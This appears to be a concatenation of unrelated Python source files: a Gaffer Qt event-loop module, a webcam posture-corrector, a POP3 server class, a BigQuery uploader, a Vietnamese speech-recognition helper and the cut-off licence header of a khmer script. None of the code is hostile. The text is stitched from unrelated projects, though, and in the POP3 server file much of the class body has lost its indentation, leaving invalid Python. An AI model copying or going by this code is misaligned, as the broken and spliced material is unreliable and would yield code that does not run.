# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import time
import weakref
import threading
import traceback
import functools
import six
import IECore
import Gaffer
import GafferUI
from Qt import QtCore
from Qt import QtWidgets
## This class provides the event loops used to run GafferUI based applications.
class EventLoop( object ) :

	# The different strategies used to drive the Qt event loop, depending on
	# which host application (if any) we find ourselves embedded in.
	__RunStyle = IECore.Enum.create( "Normal", "PumpThread", "AlreadyRunning", "Houdini" )

	## Creates a new EventLoop. Note that if you are creating the primary
	# EventLoop for an application then you should use mainEventLoop() instead.
	def __init__( self, __qtEventLoop=None ) :

		if __qtEventLoop is None :
			# No Qt loop supplied - make a nested QEventLoop. This only makes
			# sense while the main loop is already running.
			if self.__mainEventLoop is None or self.__mainEventLoop.__startCount==0 :
				raise Exception( "Main event loop is not running - perhaps you should use EventLoop.mainEventLoop()?" )
			self.__qtEventLoop = QtCore.QEventLoop()
		else :
			self.__qtEventLoop = __qtEventLoop

		self.__runStyle = self.__RunStyle.Normal
		if isinstance( self.__qtEventLoop, QtWidgets.QApplication ) :
			# We were given the application itself, so we may be embedded in a
			# host (Maya/Houdini/Nuke) with its own ideas about who runs the
			# event loop. Detect the host and pick a suitable run style.
			try :
				import maya.OpenMaya
				if maya.OpenMaya.MGlobal.apiVersion() < 201100 :
					# Maya before 2011 doesn't use Qt natively, so we must
					# pump the Qt event loop ourselves.
					self.__runStyle = self.__RunStyle.PumpThread
				else :
					self.__runStyle = self.__RunStyle.AlreadyRunning
			except ImportError :
				pass
			try :
				import hou
				if hou.applicationVersion()[0] < 14 :
					# Houdini before 14 doesn't use Qt natively - pump via its
					# event loop callback mechanism instead.
					self.__runStyle = self.__RunStyle.Houdini
				else :
					self.__runStyle = self.__RunStyle.AlreadyRunning
			except ImportError :
				pass
			try :
				import nuke
				self.__runStyle = self.__RunStyle.AlreadyRunning
			except ImportError :
				pass

		self.__startCount = 0
		self.__pumpThread = None
		self.__houdiniCallback = None

	## Starts the event loop, passing control to the UI code. This function returns
	# when the corresponding stop() method is called. See documentation for
	# mainEventLoop() for exceptions to this rule.
	def start( self ) :

		self.__startCount += 1

		if self.__runStyle == self.__RunStyle.Normal :
			assert( self.__startCount == 1 )
			self.__qtEventLoop.exec_()
		elif self.__runStyle == self.__RunStyle.PumpThread :
			if self.__pumpThread is None :
				self.__pumpThread = threading.Thread( target = self.__pumpThreadFn )
				self.__pumpThread.start()
		elif self.__runStyle == self.__RunStyle.Houdini :
			if self.__houdiniCallback is None :
				import hou
				hou.ui.addEventLoopCallback( functools.partial( self.__pump, 5 ) )
				# Remember the callback so we can remove it again in stop().
				self.__houdiniCallback = hou.ui.eventLoopCallbacks()[-1]
		else :
			# RunStyle.AlreadyRunning
			# host application is using qt natively, no need to do anything.
			pass

	## Stops the event loop last started using start().
	def stop( self ) :

		assert( self.__startCount > 0 )

		if self.__runStyle == self.__RunStyle.Normal :
			assert( self.__startCount == 1 )
			self.__qtEventLoop.exit()
		elif self.__runStyle == self.__RunStyle.PumpThread :
			## \todo Should we try to stop the pump thread
			# when self.__startCount hits 0? Right not we're
			# just keeping it running on the assumption we'll
			# need it again soon.
			pass
		elif self.__runStyle == self.__RunStyle.Houdini :
			if self.__startCount == 1 and self.__houdiniCallback :
				import hou
				hou.ui.removeEventLoopCallback( self.__houdiniCallback )
				self.__houdiniCallback = None
		else :
			# RunStyle.AlreadyRunning
			pass

		self.__startCount -= 1

	## Returns true if this event loop is currently running.
	def running( self ) :

		return self.__startCount > 0

	# if we're running embedded in an application which already uses qt (like maya 2011 or later)
	# then there'll already be an application, which we'll share. if not we'll make our own.
	if QtWidgets.QApplication.instance() :
		__qtApplication = QtWidgets.QApplication.instance()
	else :
		# Set the style explicitly so we don't inherit one from the desktop
		# environment, which could mess with our own style (on GNOME for instance,
		# our icons can come out the wrong size).
		style = QtWidgets.QApplication.setStyle( "Fusion" )
		# Stop icons/fonts being tiny on high-dpi monitors. Must be set before
		# the application is created.
		QtWidgets.QApplication.setAttribute( QtCore.Qt.AA_EnableHighDpiScaling )
		assert( style is not None )
		__qtApplication = QtWidgets.QApplication( [ "gaffer" ] )

	# Fixes laggy interaction with tablets, equivalent to the old
	# QT_COMPRESS_TABLET_EVENTS env var supported in Maya Qt builds.
	__qtApplication.setAttribute( QtCore.Qt.AA_CompressTabletEvents, True )

	# The singleton returned by mainEventLoop(), created lazily.
	__mainEventLoop = None
	## Returns the main event loop for the application. This should always
	# be started before running any other nested event loops. In the standalone
	# Gaffer applications, the main event loop acts like any other, but when
	# GafferUI is embedded in another application (like Maya) it behaves slightly
	# differently. In this case, the start() method returns immediately so that
	# the GafferUI event loop may be interleaved with the event loop of the host
	# application. Additionally, the start() method may also be called multiple
	# times to allow several GafferUI-based applications to run in the same host.
	# The main event loop will therefore only cease running when the number of
	# calls to stop() matches the number of calls to start().
	@classmethod
	def mainEventLoop( cls ) :

		if cls.__mainEventLoop is None :
			cls.__mainEventLoop = cls( cls.__qtApplication )

		return cls.__mainEventLoop

	# Registered idle callbacks, and the QTimer used to invoke them.
	__idleCallbacks = []
	__idleTimer = None
	## Adds a function to be called when the event loop is idle (has no events
	# remaining to be processed). If callback returns False then it will be removed
	# automatically after running, if it returns True it will be called again until
	# it returns False, or until removeIdleCallback() is called.
	## \todo This should probably be replaced with an idleSignal() like the one we
	# have in GafferUI.Gadget.
	@classmethod
	def addIdleCallback( cls, callback ) :

		assert( callback not in cls.__idleCallbacks )
		cls.__idleCallbacks.append( callback )
		cls.__ensureIdleTimer()

	## Removes an idle callback previously created with addIdleCallback().
	@classmethod
	def removeIdleCallback( cls, callback ) :

		cls.__idleCallbacks.remove( callback )

	## Convenience method to introduce a delay on the mainEventLoop().
	@classmethod
	def waitForIdle( cls, count = 1000 ) :

		cls.__idleCount = 0
		# Stops the main loop once we have been idle `count` times.
		def f() :

			cls.__idleCount += 1

			if cls.__idleCount >= count :
				EventLoop.mainEventLoop().stop()
				return False

			return True

		EventLoop.addIdleCallback( f )
		EventLoop.mainEventLoop().start()

	## Widgets may only be manipulated on the thread where mainEventLoop() is running. It
	# is common to want to perform some background processing on a secondary thread, and
	# to update the UI during processing or upon completion. This function can be used from
	# such a secondary thread to queue a callable to be called on the main thread. If called
	# from the main thread, the callable is called immediately.
	@classmethod
	def executeOnUIThread( cls, callable, waitForResult=False ) :

		return _uiThreadExecutor.execute( callable, waitForResult )

	## Context manager that blocks callables queued with `executeOnUIThread()`.
	# The calls will be deferred until after the block exits. This is useful
	# to defer graph edits that would cause unwanted cancellation of a
	# BackgroundTask.
	## \todo Blocking all UI thread execution is overkill. We could add a
	# `subject` argument to `ParallelAlgo::callOnUIThread()`, mirroring the
	# existing argument to `ParallelAlgo::callOnBackgroundThread()`. Then
	# we could limit the blocking to calls with the relevant subject.
	class BlockedUIThreadExecution( object ) :

		def __enter__( self ) :

			_uiThreadExecutor.blockExecution()

		def __exit__( self, type, value, traceBack ) :

			_uiThreadExecutor.unblockExecution()

	@classmethod
	def __ensureIdleTimer( cls ) :

		assert( QtCore.QThread.currentThread() == EventLoop.__qtApplication.thread() )

		if cls.__idleTimer is None :
			cls.__idleTimer = QtCore.QTimer( cls.__qtApplication )
			cls.__idleTimer.timeout.connect( cls.__qtIdleCallback )

		if not cls.__idleTimer.isActive() :
			cls.__idleTimer.start()

	# This is a staticmethod rather than a classmethod because PySide 1.0.5
	# doesn't support classmethods as slots.
	@staticmethod
	def __qtIdleCallback() :

		assert( QtCore.QThread.currentThread() == EventLoop.__qtApplication.thread() )

		GafferUI.Gadget.idleSignal()()

		for c in EventLoop.__idleCallbacks[:] : # slice takes copy, so we can remove during iteration

			try :
				if not c() :
					EventLoop.__idleCallbacks.remove( c )
			except Exception as e :
				# if the callback throws then we remove it anyway, because
				# we don't want to keep invoking the same error over and over.
				EventLoop.__idleCallbacks.remove( c )
				# report the error
				IECore.msg( IECore.Msg.Level.Error, "EventLoop.__qtIdleCallback", "".join( traceback.format_exc() ) )

		# Nothing left to service - stop the timer so we don't busy-wait.
		if len( EventLoop.__idleCallbacks )==0 and GafferUI.Gadget.idleSignal().empty() :
			EventLoop.__idleTimer.stop()

	@classmethod
	def _gadgetIdleSignalAccessed( cls ) :

		# It would be an error to access the idle signal from anything but the main
		# thread, because it would imply multiple threads fighting over the same signal.
		assert( QtCore.QThread.currentThread() == EventLoop.__qtApplication.thread() )

		cls.__ensureIdleTimer()

	def __pumpThreadFn( self ) :

		import maya.utils

		# Forever schedule a pump of the Qt loop on Maya's main thread.
		while 1 :
			time.sleep( 0.01 )
			maya.utils.executeDeferred( self.__pump )

	def __pump( self, thrusts=1 ) :

		# Process a handful of pending Qt events without blocking.
		for thrust in range( 0, thrusts ) :
			self.__qtEventLoop.processEvents()

GafferUI.Gadget._idleSignalAccessedSignal().connect( EventLoop._gadgetIdleSignalAccessed, scoped = False )
# Internal implementation for `EventLoop.executeOnUIThread()`. There are
# multiple ways of achieving this in Qt, but they all boil down to scheduling an
# event on the main loop. We have tried the following :
#
# - Creating a new QObject to wrap the callable, moving it to the main thread,
#   and then using `postEvent()` to trigger a call to `customEvent()`, which
#   executes the callable. This triggered GIL/refcount bugs in PySide which meant
#   that the QObject was occasionally deleted prematurely.
# - Having a single QObject living on the main thread, with a signal which we
#   emitted from the background thread to schedule execution. This was more reliable,
#   but still triggered occasional PySide crashes.
# - Having a single QObject living on the main thread, and using `QMetaObject.invokeMethod()`
#   to queue a call to one of its methods. This is the approach we currently use.
class _UIThreadExecutor( QtCore.QObject ) :

	def __init__( self ) :

		QtCore.QObject.__init__( self )
		# In an ideal world, we'd pass the callables via arguments to
		# `__executeInternal`. But I haven't figured out how to do that via
		# `invokeMethod()` and doing the equivalent via signals crashes PySide.
		# So instead we pass the callables via this queue and just use
		# `invokeMethod()` to schedule their removal on the UI thread.
		self.__queue = six.moves.queue.Queue()
		# While not None, a list buffering calls deferred by `blockExecution()`.
		self.__blockedCallables = None

	# Schedules `callable` on the UI thread. If `waitForResult` is True, blocks
	# the calling thread until the callable has run, and returns its result.
	def execute( self, callable, waitForResult ) :

		if QtCore.QThread.currentThread() == QtWidgets.QApplication.instance().thread() :
			# Already on the UI thread - just do it.
			return callable()

		resultCondition = threading.Condition() if waitForResult else None
		if resultCondition is not None :
			resultCondition.acquire()

		self.__queue.put( ( callable, resultCondition ) )
		QtCore.QMetaObject.invokeMethod( self, "__executeInternal", QtCore.Qt.ConnectionType.QueuedConnection )

		if resultCondition is not None :
			# `__executeInternal` stores the result on the condition and
			# notifies us when it has run.
			resultCondition.wait()
			resultCondition.release()
			return resultCondition.resultValue

	def blockExecution( self ) :

		assert( QtCore.QThread.currentThread() == QtWidgets.QApplication.instance().thread() )
		# Set up a container to buffer into
		assert( self.__blockedCallables is None )
		self.__blockedCallables = []

	def unblockExecution( self ) :

		assert( QtCore.QThread.currentThread() == QtWidgets.QApplication.instance().thread() )
		# Schedule each of the buffered calls again, and then clear the buffer.
		# We don't just execute them immediately because it would be surprising
		# to the user of `BlockedUIThreadExecution` to have arbitrary code be
		# executed in the middle of their function.
		assert( isinstance( self.__blockedCallables, list ) )
		for callable, resultCondition in self.__blockedCallables :
			self.__queue.put( ( callable, resultCondition ) )
			QtCore.QMetaObject.invokeMethod( self, "__executeInternal", QtCore.Qt.ConnectionType.QueuedConnection )

		self.__blockedCallables = None

	@QtCore.Slot()
	def __executeInternal( self ) :

		assert( QtCore.QThread.currentThread() == QtWidgets.QApplication.instance().thread() )

		callable, resultCondition = self.__queue.get()
		if self.__blockedCallables is not None :
			# Execution is currently blocked - buffer the call for
			# `unblockExecution()` to reschedule later.
			self.__blockedCallables.append( ( callable, resultCondition ) )
		else :
			result = callable()
			if resultCondition is not None :
				resultCondition.acquire()
				resultCondition.resultValue = result
				resultCondition.notify()
				resultCondition.release()
# Single module-level executor instance, created on the main thread at import time.
_uiThreadExecutor = _UIThreadExecutor()

# Service the requests made to `ParallelAlgo::callOnUIThread()`.
Gaffer.ParallelAlgo.pushUIThreadCallHandler( EventLoop.executeOnUIThread )
|
app.py | import mediapipe as mp # package for pose detection
import cv2 # package for computer vision
import time # python time module
import threading # run multiple processes at the same time
from gtts import gTTS # google text-to-speech module
import os # importing os module
# importing self defined utility functions
from util import *
# configuring mediapipe functions
mp_drawing = mp.solutions.drawing_utils
mp_drawing_styles = mp.solutions.drawing_styles
mp_holistic = mp.solutions.holistic
# Processes Real time feed to analyse frames
def cam_feed(cap):
    """Continuously read frames from `cap`, run holistic detection, draw the
    detected landmarks and show the mirrored feed until 'q' is pressed."""
    # Initiate holistic model
    with mp_holistic.Holistic(min_detection_confidence=0.5, min_tracking_confidence=0.5) as holistic:
        while cap.isOpened():
            # Skip the frame if anything goes wrong while capturing or
            # running detection.
            try:
                success, img = cap.read()
                if not success:
                    print("Unable to load video.")
                    continue
                img = cv2.resize(img, None, fx=1.5, fy=1.5, interpolation=cv2.INTER_CUBIC)
                # Recolor Feed (mediapipe expects RGB; read-only lets it avoid a copy)
                img.flags.writeable = False
                img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
                # Make Detections
                results = holistic.process(img)
            except Exception:
                # BUG FIX: the original used `except not results:`, which is not
                # an exception class - at exception time it evaluates a bool (or
                # raises NameError since `results` may be unbound) and would
                # itself fail with a TypeError. Catch real failures instead.
                continue
            # Recolor image back to BGR for rendering
            img.flags.writeable = True
            img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
            # Right Hand
            mp_drawing.draw_landmarks(img, results.right_hand_landmarks, mp_holistic.HAND_CONNECTIONS)
            # Left Hand
            mp_drawing.draw_landmarks(img, results.left_hand_landmarks, mp_holistic.HAND_CONNECTIONS)
            # Pose Detections
            mp_drawing.draw_landmarks(img, results.pose_landmarks, mp_holistic.POSE_CONNECTIONS,
                                      landmark_drawing_spec=mp_drawing_styles.get_default_pose_landmarks_style())
            # Flip the image horizontally for a selfie-view display.
            cv2.imshow('Real-time Webcam', cv2.flip(img, 1))
            if cv2.waitKey(10) & 0xFF == ord('q'):
                break
# Function to check Posture
def check(cap):
    """Periodically analyse a frame and speak/print a correction message
    whenever bad posture is detected."""
    # Initiate holistic model
    with mp_holistic.Holistic(min_detection_confidence=0.5, min_tracking_confidence=0.5) as holistic:
        while cap.isOpened():
            # Handle errors during capture/detection by skipping the frame:
            # missing landmarks make detect_landmark raise AttributeError.
            try:
                success, img = cap.read()
                if not success:
                    print("Unable to load video.")
                    continue
                img = cv2.resize(img, None, fx=1.5, fy=1.5, interpolation=cv2.INTER_CUBIC)
                # Recolor Feed
                img.flags.writeable = False
                img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
                # Make Detections
                results = holistic.process(img)
                # Recolor image back to BGR for rendering
                img.flags.writeable = True
                img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
                # detecting landmarks
                coord = detect_landmark(img, results, True)
            except AttributeError:
                continue
            posture = correct_posture(coord)
            if not posture:
                # Bad posture: build, save and play a spoken correction message.
                text = build_message(coord)
                speech = gTTS(text = text, lang = 'en', slow = False)
                speech.save("text.mp3")
                # NOTE(review): "start" is a Windows shell command; this playback
                # is not portable to other platforms - confirm target OS.
                os.system("start text.mp3")
                print(text)
            # Flip the image horizontally for a selfie-view display.
            cv2.imshow('Posture Corrector', cv2.flip(img, 1))
            # Throttle posture checks to roughly one every 20 seconds.
            time.sleep(20)
            if cv2.waitKey(10) & 0xFF == ord('q'):
                break
def main():
    """Open the default webcam and run the live-feed and posture-check loops
    concurrently, cleaning up once both have finished."""
    # Getting Real-time Webcam feed
    capture = cv2.VideoCapture(0)
    # Run both loops at the same time on the shared capture device.
    workers = [
        threading.Thread(target=cam_feed, args=[capture]),
        threading.Thread(target=check, args=[capture]),
    ]
    for worker in workers:
        worker.start()
    # Waits for both threads to end before releasing the capture device.
    for worker in workers:
        worker.join()
    # Destroys Video Capture object and closes the window
    capture.release()
    cv2.destroyAllWindows()
if __name__ == "__main__":
    main()
POP3SF.py | # SPDX-License-Identifier: BSD-3-Clause
#
# Copyright (c) 2021 Vít Labuda. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from typing import Union, List
import gc
import socket
import select
import ssl
import threading
from .Settings import Settings
from .Auxiliaries import Auxiliaries
from .GlobalResources import GlobalResources
from .ClientHandler import ClientHandler
from .ClientConnectionInfoHolder import ClientConnectionInfoHolder
from .ServerSocketInfoHolder import ServerSocketInfoHolder
from .PerUserExclusivityEnsurer import PerUserExclusivityEnsurer
from .POP3SFRuntimeError import POP3SFRuntimeError
class POP3SF:
PROGRAM_VERSION: float = 1.0
_LISTEN_BACKLOG: int = 64
    def __init__(self):
        # Normalize the process environment before anything else runs.
        Auxiliaries.change_working_directory_and_umask()
        GlobalResources.set_resources(Settings.get_logger(), PerUserExclusivityEnsurer())
        self._threads: List[threading.Thread] = []  # per-client handler threads
        self._server_sockets: List[Union[socket.socket, ssl.SSLSocket]] = self._generate_server_sockets()
        self._server_poll_object: select.poll = self._generate_poll_object_from_server_sockets()
        Auxiliaries.drop_root_privileges_if_needed()  # The root privileges are dropped after the server sockets have been created, as the sockets have already been bound, possibly to a privileged port.
        self._continue_polling_for_new_connections: bool = True
        self._next_connection_id: int = 1  # monotonically increasing ID handed to each accepted connection
def _generate_server_sockets(self) -> List[Union[socket.socket, ssl.SSLSocket]]:
server_sockets = []
for info_holder in Settings.LISTEN_ON:
server_sockets += self._generate_server_sockets_from_info_holder(info_holder)
if len(server_sockets) == 0:
raise POP3SFRuntimeError("The server couldn't create any listening server sockets!")
return server_sockets
    def _generate_server_sockets_from_info_holder(self, info_holder: ServerSocketInfoHolder) -> List[Union[socket.socket, ssl.SSLSocket]]:
        """Create one listening socket per address the endpoint resolves to
        (e.g. separate IPv4 and IPv6 sockets), TLS-wrapped when configured."""
        server_sockets = []
        addrinfo_list = socket.getaddrinfo(info_holder.listen_address, info_holder.listen_port, proto=socket.IPPROTO_TCP)
        for addrinfo in addrinfo_list:
            socket_ = self._create_plain_tcp_server_socket(addrinfo)
            if info_holder.use_tls:
                socket_ = self._wrap_plain_tcp_server_socket_in_tls(socket_, info_holder.tls_certificate_file, info_holder.tls_private_key_file)
            server_sockets.append(socket_)
        return server_sockets
def _create_plain_tcp_server_socket(self, addrinfo: tuple) -> Union[socket.socket, ssl.SSLSocket]:
plain_tcp_socket = socket.socket(family=addrinfo[0], type=addrinfo[1], proto=addrinfo[2])
plain_tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if addrinfo[0] == socket.AF_INET6:
plain_tcp_socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1) # Disable dual-stack on IPv6 sockets
plain_tcp_socket.bind(addrinfo[4])
plain_tcp_socket.listen(POP3SF._LISTEN_BACKLOG)
return plain_tcp_socket
def _wrap_plain_tcp_server_socket_in_tls(self, plain_tcp_socket: Union[socket.socket, ssl.SSLSocket], certificate_file: str, private_key_file: str) -> Union[socket.socket, ssl.SSLSocket]:
tls_context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
tls_context.load_cert_chain(certfile=certificate_file, keyfile=private_key_file)
return tls_context.wrap_socket(plain_tcp_socket, server_side=True)
def _generate_poll_object_from_server_sockets(self) -> select.poll:
poll_object = select.poll()
for server_socket in self._server_sockets:
poll_object.register(server_socket, select.POLLIN)
return poll_object
def start_server_loop(self) -> None:
self._send_on_start_log_messages()
while self._continue_polling_for_new_connections:
self._poll_server_sockets()
for server_socket in self._server_sockets:
server_socket.close()
self._send_on_exit_log_messages()
def _send_on_start_log_messages(self) -> None:
GlobalResources.get_logger().info("POP3SF successfully started.")
GlobalResources.get_logger().info("Listening on " + ", ".join(map(Auxiliaries.get_server_sockets_address_as_string, self._server_sockets)) + ".")
for server_socket in self._server_sockets:
if not isinstance(server_socket, ssl.SSLSocket):
GlobalResources.get_logger().warning("The server socket listening on {} is not secured with TLS! Personal information may get leaked!".format(Auxiliaries.get_server_sockets_address_as_string(server_socket)))
def _send_on_exit_log_messages(self) -> None:
GlobalResources.get_logger().info("The server is exiting.")
def _poll_server_sockets(self) -> None:
try:
poll_events = self._server_poll_object.poll()
except KeyboardInterrupt:
self._continue_polling_for_new_connections = False
return
for fd, events in poll_events:
if events & select.POLLIN:
server_socket = self._find_server_socket_by_polled_fd(fd)
self._accept_client_connection_on_a_server_socket(server_socket)
else:
raise POP3SFRuntimeError("Unexpected event(s) ({}) happened on server socket with FD {}!".format(events, fd))
def _find_server_socket_by_polled_fd(self, fd: int) -> Union[socket.socket, ssl.SSLSocket]:
for server_socket in self._server_sockets:
if fd == server_socket.fileno():
return server_socket
raise POP3SFRuntimeError("The poll() function returned an invalid file descriptor!")
def _accept_client_connection_on_a_server_socket(self, server_socket: Union[socket.socket, ssl.SSLSocket]) -> None:
try:
client_socket, client_addr = server_socket.accept()
except ssl.SSLError:
return
connection_info = ClientConnectionInfoHolder(self._next_connection_id, client_socket, client_addr)
self._start_per_client_thread(connection_info)
self._next_connection_id += 1
def _start_per_client_thread(self, connection_info: ClientConnectionInfoHolder) -> None:
if not self._check_if_another_client_can_be_connected():
try:
connection_info.socket.close()
except OSError:
pass
return
thread = threading.Thread(target=ClientHandler.initialize_client_handler, args=(connection_info,), daemon=True)
thread.start()
self._threads.append(thread)
def _check_if_another_client_can_be_connected(self) -> bool:
# For every connected client, a new thread is created.
# The concurrently connected client limit (= concurrently running thread limit) is defined in the Settings.py file.
self._threads = [thread for thread in self._threads if thread.is_alive()]
# Invoke the garbage collector manually to forcibly release any unnecessary memory associated with the died threads (disconnected clients) before connecting another client
gc.collect()
return len(self._threads) < Settings.MAX_CONCURRENT_CLIENTS
|
bq.py | #
# Licensed under the LICENSE.
# Copyright 2017, Sony Mobile Communications Inc.
#
'''
BigQuery uploads
'''
import base64
from threading import Thread
from os import environ
import requests
from utils.environment import TE
class BQ:
    """
    Class implementing BigQuery uploads.
    :class: BQ
    """
    BASE_URL = 'https://.../{}/{}'
    # NOTE(review): this runs once at class-definition (import) time and looks
    # like a leftover debug print — consider removing it.
    print(environ.get('TENSHI_WORKER_URL'))

    def __init__(self):
        """
        Constructor. Sets data set based on current environment.
        """
        # self._data_set = 'test'
        self._data_set = 'stage'
        if TE.is_prod():
            # NOTE(review): 'stage' is also assigned in the prod branch —
            # presumably a production data set name was intended; confirm.
            self._data_set = 'stage'

    @staticmethod
    def _wrap_data(data_str):
        """
        Wraps data to be accepted by the worker.
        :param data_str: Data to send as a stringified JSON.
        :return: The wrapped dictionary.
        """
        return {
            'message': {
                'data': base64.b64encode(data_str.encode('utf-8')).decode('utf-8')
            }
        }

    @staticmethod
    def _post(url, data_str):
        """
        Posts data to the worker.
        :param url: URL to post data to.
        :param data_str: The data to post as a stringified JSON.
        """
        response = requests.post(url, json=BQ._wrap_data(data_str))
        print(response.content)

    @staticmethod
    def _async_post(url, data_str):
        """
        Posts data to the worker asynchronously.
        :param url: URL to post data to.
        :param data_str: The data to post as a stringified JSON.
        :return:
        """
        # BUG FIX: the original passed ``target=BQ._post(url, data_str)``, which
        # CALLED _post synchronously on the current thread and handed its return
        # value (None) to Thread — so the "async" post actually blocked and the
        # started thread did nothing. Pass the callable and its args instead.
        Thread(target=BQ._post, args=(url, data_str)).start()

    def pro(self, data_str):
        """
        Sends data to the pick route optimization table in BQ.
        :param data_str: Payload to send as a stringified JSON.
        """
        print('Sending data to /pro')
        BQ._async_post((BQ.BASE_URL.format(self._data_set, 'pickroute')), data_str)

    def batching(self, data_str):
        """
        Sends data to the batching table in BQ.
        :param data_str: Payload to send as a stringified JSON.
        :return:
        """
        print('Sending data to /batching')
        BQ._async_post(BQ.BASE_URL.format(self._data_set, 'singlebatch'), data_str)
# It's a singleton, of course :)
# NOTE(review): rebinding the class name to an instance makes the BQ class
# itself unreachable for importers — only this instance is exported.
BQ = BQ()
|
VoiceRecognition.py | import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import threading
import time
import playsound
import speech_recognition as sr
#from webdriver_manager.chrome import ChromeDriverManager
import os
class VoiceRecognition:
    """Vietnamese speech recognition helpers built on the ``speech_recognition``
    package (Google Web Speech API), plus simple audio playback."""

    def __init__(self):
        self.language = 'vi'
        #self.path = ChromeDriverManager().install()
        # self.source = sr.Microphone()
        # print(self.source)
        self.recognizer = sr.Recognizer()
        self.text = []
        # Audio chunks captured by the background listener, waiting for recognition.
        self.audio_array = []
        # Recognized phrases (lower-cased); seeded with '' so [-1] is always valid.
        self.list_of_text = ['']

    def setup_listening_queue(self):
        """Start background listening and the recognition worker thread."""
        self.listen_audio()
        threading.Thread(target=self.thread_recognize).start()

    def callback(self, recognizer, audio):
        """Called by listen_in_background for every captured audio phrase."""
        self.audio_array.append(audio)

    def thread_recognize(self):
        """Worker loop: drain queued audio chunks and append recognized text.

        BUG FIX: the original deleted items from ``self.audio_array`` while
        iterating it with ``enumerate()``, which skips elements and can delete
        the wrong index once an earlier item has been removed. Pop chunks from
        the front instead; a chunk is discarded whether or not recognition
        succeeds, matching the original intent.
        """
        while True:
            while self.audio_array:
                audio = self.audio_array.pop(0)
                try:
                    text = self.recognizer.recognize_google(audio, language="vi-VN")
                    self.list_of_text.append(text.lower())
                except Exception:
                    # Recognition failed (silence / network error): drop the chunk.
                    # The original used a bare except, which also swallowed
                    # SystemExit/KeyboardInterrupt.
                    pass
            # Avoid burning 100% CPU while the queue is empty.
            time.sleep(0.05)

    def listen_audio(self):
        """Start non-blocking background capture; chunks arrive via callback()."""
        self.recognizer.listen_in_background(sr.Microphone(), self.callback, 3)

    def text_recognition(self):
        """Blocking one-shot capture + recognition; returns lower-cased text or ''."""
        text = None
        start = time.time()
        r = sr.Recognizer()
        print("Step 1: ", time.time() - start)
        with sr.Microphone() as source:
            # self.recognizer.adjust_for_ambient_noise(source, 1)
            print("Step 2: ", time.time() - start)
            print("Tôi: ", end='')
            audio = r.listen(source, phrase_time_limit=0.5)
            print("Step 3: ", time.time() - start)
        try:
            text = r.recognize_google(audio, language="vi-VN")
            print("Step 4: ", time.time() - start)
        except Exception:
            print("...")
        if text:
            print("Step 5: ", time.time() - start)
            return text.lower()
        else:
            return ""

    def play_audio_file(self, file):
        """Play an audio file given a path relative to the working directory."""
        # NOTE(review): hard-coded debug print of an unrelated path; candidate for removal.
        print(os.path.abspath("voice/anh_can_em_giup_gi_a.mp"))
        playsound.playsound(os.path.abspath("" + file))
# Manual smoke test: plays a (deliberately bogus) audio file path.
if __name__ == "__main__":
    voice = VoiceRecognition()
    voice.play_audio_file("asd")
    # voice.setup_listening_queue()
    # while True:
    #     text = voice.list_of_text[-1]
    #     print("ok")
    #     print(text)
|
optimal_args_hashbits.py | #! /usr/bin/env python
# This file is part of khmer, https://github.com/dib-lab/khmer/, and is
# Copyright (C) 2015, Michigan State University.
# Copyright (C) 2015, The Regents of the University of California.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the Michigan State University nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
